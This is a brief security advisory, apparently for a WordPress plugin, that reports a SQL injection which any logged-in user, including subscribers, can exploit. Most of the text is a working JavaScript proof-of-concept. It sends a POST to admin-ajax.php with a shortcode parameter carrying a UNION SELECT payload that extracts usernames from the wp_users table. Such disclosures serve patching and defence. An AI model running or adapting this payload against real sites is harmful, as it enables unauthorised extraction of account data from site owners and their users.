The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated users, such as subscribers.
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=parse-media-shortcode&shortcode=[randomtext category="\' UNION SELECT 1, user_login COLLATE utf8mb4_unicode_520_ci FROM wp_users #"]'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));